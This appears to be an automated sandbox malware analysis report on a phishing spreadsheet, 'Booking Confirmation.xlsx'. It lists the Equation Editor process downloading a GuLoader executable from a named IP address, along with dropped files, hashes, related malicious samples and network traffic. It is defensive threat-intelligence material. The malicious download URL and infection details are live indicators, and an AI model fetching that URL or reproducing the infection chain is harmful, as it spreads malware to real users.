                http://www.day.com/dam/1.0 | 3E10AF3D.emf.0.dr | false | | high

                  Contacted IPs


                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  180.214.239.39 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:448719
                  Start date:14.07.2021
                  Start time:16:54:15
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Booking Confirmation.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:2
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winXLSX@4/11@0/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 53%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  16:55:06 | API Interceptor | 77x Sleep call for process: EQNEDT32.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  Match | Associated Sample Name / URL | Detection | Context
                  180.214.239.39 | 6306093940.xlsx | malicious | 180.214.239.39/ssh/.svchost.exe
                  180.214.239.39 | 6306093940.xlsx | malicious | 180.214.239.39/mssn/.svchost.exe

                  Domains

                  No context

                  ASN

                  Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

                  Associated Sample Name / URL | Detection | Context
                  kung.xlsx | malicious | 103.140.250.43
                  TT PAYMENT CONFIRMATION.xlsx | malicious | 103.89.90.94
                  lokibot.docx | malicious | 103.133.106.144
                  payment advice.exe | malicious | 103.89.91.38
                  PROFORMA INVOICE.xlsx | malicious | 103.140.250.43
                  INVM220210055600512.xlsx | malicious | 103.89.90.94
                  xP0clPWhrv.exe | malicious | 103.133.106.117
                  Doc1892071321.exe | malicious | 103.133.104.146
                  http___103.89.90.94_suket_wininit.exe | malicious | 103.89.90.94
                  DOC.1000000567.267805032019.doc__.rtf | malicious | 103.133.106.117
                  shipping quote.xlsx | malicious | 103.140.250.43
                  INVM220210055600512.xlsx | malicious | 103.89.90.94
                  NEW ORDER.xlsx | malicious | 103.140.250.43
                  OUTSTANDING SOA.xlsx | malicious | 103.145.253.94
                  6306093940.xlsx | malicious | 180.214.239.39
                  INVM220210055600512.xlsx | malicious | 103.89.90.94
                  pXL06trbQ2.exe | malicious | 103.133.106.117
                  DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc | malicious | 103.133.106.117
                  11.xlsx | malicious | 103.140.250.43
                  6306093940.xlsx | malicious | 180.214.239.39

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:downloaded
                  Size (bytes):267376
                  Entropy (8bit):4.7769054763067915
                  Encrypted:false
                  SSDEEP:1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                  MD5:FCFB0EC70F1419EDE8A534CC95CB61E9
                  SHA1:D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                  SHA-256:FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                  SHA-512:FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 7%
                  Reputation:low
                  IE Cache URL:http://180.214.239.39/port/.svchost.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E7724F.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                  Category:dropped
                  Size (bytes):62140
                  Entropy (8bit):7.529847875703774
                  Encrypted:false
                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33A5C606.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E10AF3D.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):648132
                  Entropy (8bit):2.812180637073989
                  Encrypted:false
                  SSDEEP:3072:y34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:c4UcLe0JOcXuunhqcS
                  MD5:AF315ACBE803E8A5729F0B6B0CA5942C
                  SHA1:C21EDD8E79667300365573DF36DBEAD853977E9C
                  SHA-256:013B5B9200F01398565C59B4F815AF21F513FF7DC696787C8D838A510A101199
                  SHA-512:F3F6E76076AB29217315D2EC0E3E2F976290282F2F7F2FE6B6B4ED18363221E829882C306A01C75C4C81684884DF8F195869A889A83A12C13447F9A505A69FED
                  Malicious:false
                  Reputation:low
                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................P$...../..f.P.@U.%...../.../.....L./.../.RQ.RL./.D./......./.0./.$Q.RL./.D./. ...Id.PD./.L./. ............d.P........................................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...D./.x./..8.P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87034804.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):94963
                  Entropy (8bit):7.9700481154985985
                  Encrypted:false
                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                  MD5:17EC925977BED2836071429D7B476809
                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                  Malicious:false
                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89452338.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                  Category:dropped
                  Size (bytes):62140
                  Entropy (8bit):7.529847875703774
                  Encrypted:false
                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                  Malicious:false
                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C86F0153.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9A0341A.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):7592
                  Entropy (8bit):5.4446939747299385
                  Encrypted:false
                  SSDEEP:96:znUgcqHOvlJaX1/0q7r097v47LqLw1KG37oV9oaUd+dSOPUe1jc:bU/vTVgaL0K79oaUd+dQe1jc
                  MD5:90E7CF2722D8B0130292A0D91E15C2DF
                  SHA1:B2FBF1814AC8BBEED7A6F3074703BA34B392F107
                  SHA-256:ED43E23E4285C0EFBA4F46C6227BDDF4FD3C4DD758DD1280A6D8D5C21BD7E210
                  SHA-512:D280C16F0287FC2CC94CD9D08C7DDE11B24A14E720B910590A10445B1CC8FC0D57C323BBF1D5F9E9238E08135FD1609B8BF7094B7B408E4F82053C9F7C630AE6
                  Malicious:false
                  Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d.........................'.q....\.............L..W.q........6.v_.q......q ...Dy.wx.................w....$.......d..........J^.q.... ^.q...x...@.......-...4...<.w................<..v.Zkv....X..o.... .........................lvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F50319D9.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):94963
                  Entropy (8bit):7.9700481154985985
                  Encrypted:false
                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                  MD5:17EC925977BED2836071429D7B476809
                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                  Malicious:false
                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                  C:\Users\user\Desktop\~$Booking Confirmation.xlsx
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious:false
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  C:\Users\Public\vbc.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):267376
                  Entropy (8bit):4.7769054763067915
                  Encrypted:false
                  SSDEEP:1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                  MD5:FCFB0EC70F1419EDE8A534CC95CB61E9
                  SHA1:D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                  SHA-256:FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                  SHA-512:FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 7%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.994338822907313
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Booking Confirmation.xlsx
                  File size:1221992
                  MD5:870a4c72bccd58de144c7b845d56c626
                  SHA1:482681f75180bbb1286e1f93ce44dfae0b6b0007
                  SHA256:37fffcbacca59290a7a3b6271ebf475a50b9e17eba113459cfc00508a7268b68
                  SHA512:0281d94a5119fbd46012ae0c9d9aedad400264803feb6f1224f031750673d7f30de78f594713b7a00c081794d39173f4992fd27dd9e8ef0fae4f82ffe523cfbf
                  SSDEEP:24576:kux4KztYcWgmU+Y/6bHtPVa6dneKiAqI3RW6Myfhc:pmK6ImUP8tPVa1Kcjyfhc
                  File Content Preview:........................>...............................................................................................z.......z.......|......................................................................................................................

                  File Icon

                  Icon Hash:e4e2aa8aa4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Booking Confirmation.xlsx"

                  Indicators

                  Has Summary Info:False
                  Application Name:unknown
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:False

                  Streams

                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                  General
                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                  File Type:data
                  Stream Size:64
                  Entropy:2.73637206947
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                  General
                  Stream Path:\x6DataSpaces/DataSpaceMap
                  File Type:data
                  Stream Size:112
                  Entropy:2.7597816111
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
                  General
                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                  File Type:data
                  Stream Size:208
                  Entropy:3.35153409046
                  Base64 Encoded:False
                  Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
                  Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                  General
                  Stream Path:\x6DataSpaces/Version
                  File Type:data
                  Stream Size:76
                  Entropy:2.79079600998
                  Base64 Encoded:False
                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1208680
                  General
                  Stream Path:EncryptedPackage
                  File Type:data
                  Stream Size:1208680
                  Entropy:7.99865188998
                  Base64 Encoded:True
                  Data ASCII:V q . . . . . . . . . . . . . . J E . . . . . y 1 R . ? . . . . . . . . ] . . . H . . . . . { p q . I . . 8 * . . . } . . . . . " = . b . f . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . .
                  Data Raw:56 71 12 00 00 00 00 00 82 1e eb 04 b0 13 98 8c 4a 45 bb 83 e7 b6 b0 79 31 52 a0 3f 01 ac 9e d3 bd 82 8b b7 5d 0a de b6 48 c8 00 ac 0c b4 7b 70 71 da 49 03 c5 38 2a af 06 1b 7d da 9c ae b6 83 22 3d e8 62 a2 66 0f e8 ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6
                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                  General
                  Stream Path:EncryptionInfo
                  File Type:data
                  Stream Size:224
                  Entropy:4.67069001022
                  Base64 Encoded:False
                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . ` . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . . . . . . . . w . . . . . . . . h | . . . . . . . . . . . . 6 G . M . $ = a _ ? . . S . P . . . . . . . " . . . @ . . | . .
                  Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 60 11 e9 09 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp                             Source Port  Dest Port  Source IP        Dest IP
                  Jul 14, 2021 16:55:35.897506952 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.153352022 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.153625965 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.154084921 CEST  49165        80         192.168.2.22     180.214.239.39
                  Jul 14, 2021 16:55:36.409609079 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.409646034 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.409670115 CEST  80           49165      180.214.239.39   192.168.2.22
                  Jul 14, 2021 16:55:36.409693003 CEST  80           49165      180.214.239.39   192.168.2.22
